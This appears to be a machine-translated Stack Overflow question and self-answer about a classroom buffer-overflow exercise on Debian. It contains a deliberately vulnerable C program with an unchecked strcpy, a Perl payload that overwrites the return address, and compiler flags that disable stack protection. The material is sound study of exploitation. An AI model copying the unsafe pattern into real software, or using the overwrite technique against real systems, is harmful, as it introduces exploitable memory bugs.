3

我最近参加了一个安全课程,其中我们简要介绍了缓冲区溢出。我对我们所涵盖的内容不满意,所以我寻找了一些示例来跟随并尝试自己并发现了缓冲区溢出攻击

我喜欢这个例子,因为它很容易理解和理解为什么一切正常。我试图跟随,但在 Debian 虚拟机而不是 Windows 中。

这是来自该站点的 C 代码:

#pragma check_stack(off)

#include <string.h>
#include <stdio.h> 

void foo(const char* input)
{
    char buf[10];

    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n");

    strcpy(buf, input);
    printf("%s\n", buf);

    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

int main(int argc, char* argv[])
{
    //Blatant cheating to make life easier on myself
    printf("Address of foo = %p\n", foo);
    printf("Address of bar = %p\n", bar);

    if (argc != 2) 
    {
        printf("Please supply a string as an argument!\n");
        return -1;
    } 

    foo(argv[1]);
    return 0;
}

代码通过给出两个函数 foo 和 bar 的地址来“作弊”。最终目标是让 bar 仅使用缓冲区溢出来运行。为此,他们提供了一个简短的 Perl 脚本:

$arg = "ABCDEFGHIJKLMNOP"."\x50\x10\x40";
$cmd = "StackOverrun ".$arg;
system($cmd);

由于我使用的是 Linux 而不是 Windows,并且由于我的bar函数地址略有不同,所以我做了几个简单的修复:

$arg = "ABCDEFGHIJKLMNOP"."\xf7\x05\x40";
$cmd = "./prog ".$arg;
system($cmd);

我认为它应该以与他们的示例相同的方式工作;Perl 脚本运行并将填充文本提供给程序,然后是新的返回地址以运行bar。但这对我不起作用。

这是运行我的 Perl 脚本的输出:

Address of foo: 0x400596
Address of bar: 0x4005f7
The current stack:
0x7fffe6b4abd8
0x7faba670c7a0
0x1d
0x6
0x7faba63b099a
0x7fffe6b4ad00

ABCDEFGHIJKLMNOPP�
Stack after input:
0x7ffc31998568
0x7f9a7c6ed7a0
0x7f9a7c421e50
0xf70550504f4e4d4c
0x7f9a7c39199a
0x7ffc31998690

在我的输出中,唯一似乎包含任何填充文本的地址是最后一个地址的第三个地址,即返回地址之前的地址。

我怀疑问题出在使用 gcc 编译我的程序,但我不确定究竟是什么原因造成的。问题也可能是 Debian。这是我编译程序的方式:

gcc -z execstack -fno-stack-protector prog.c -o prog

我希望在没有堆栈保护器的情况下进行编译将使我能够毫无问题地遵循该示例。

任何帮助都会很棒,我完全陷入困境。实际上,我可以简单地切换到 Windows,但此时我真的很想知道它为什么不起作用以及如何修复它。

4

1 回答 1

2

好的,所以我将在这里回答我自己的问题,以防万一将来看到它的人好奇。

本质上,问题源于没有打印足够的内存地址来获得堆栈的清晰图片。如果您按照问题中的链接进行操作,您会看到打印堆栈的 6 个内存地址对于他们的系统来说已经足够了,但对于我们的系统来说还不够。我的朋友建议从这里更改源代码:

printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n");

strcpy(buf, input);
printf("%s\n", buf);

printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

对此:

printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

strcpy(buf, input);

printf("Buffer: %s\n", buf);
printf("Address of Buffer: %p\n\n", buf);
printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

这种变化为我们做了两件事。首先,它将打印的地址数量增加到 13。其次,它打印缓冲区开始的地址。第二部分很重要,因为它为我们提供了在给定堆栈地址中查找的相对值。例子:

overflow@OVERFLOW:~/Overflow$ ./prog ZZZZZZ
Address of foo = 0x400596
Address of bar = 0x400601
Current Stack:
0x7fffffe6
0x7f30b7f8a7a0
0x19
0x6
0x7f30b7c2e99a
0x4007c8
0x7ffddab72653
0x7f30b7f9cde0
0x7f30b81b01a8
0x7ffddab71250
0x400672
0x7ffddab71338
0x200000000

Buffer: ZZZZZZ
Address of Buffer: 0x7ffddab71220

Stack after Input:
0x7fffffde
0x7f30b7f8a7a0
0x21
0xc
0x7f30b7c2e99a
0x4007c8
0x7ffddab72653
0x5a5a5a5a5a5a
0x7f30b81b01a8
0x7ffddab71250
0x400672
0x7ffddab71338
0x200000000

在这个例子中我们可以看到Address of Buffer: 0x7ffddab71220。如果我们查看它下面的堆栈地址,我们会发现一个非常相似的:0x7ffddab72653. 我们可以把这看作是缓冲区的起点,这样后面的几个地址就是缓冲区的存储容器。事实上,在这个例子中,我在缓冲区中打印了“ZZZZZZ”,你可以看到紧跟在我们起点之后的地址已经变成了0x5a5a5a5a5a5a,你可能已经猜到了,是十六进制的“ZZZZZZ”。

太好了,所以现在我们知道缓冲区实际从哪里开始,但我们不知道哪个是返回地址。如果我们查看函数的地址:

Address of foo = 0x400596Address of bar = 0x400601 我们可以在缓冲区起点下方的某个地方找到一个类似的值,在这种情况下0x400672

至此,我们知道了我们需要知道的一切:哪些内存地址存储缓冲区,我们要调用的函数的地址,以及最重要的是我们要覆盖的返回地址。在这一点上,这是一个试验 perl 脚本的问题,将字符添加到缓冲区,直到我们得到所需的结果。

于 2016-04-30T06:15:23.857 回答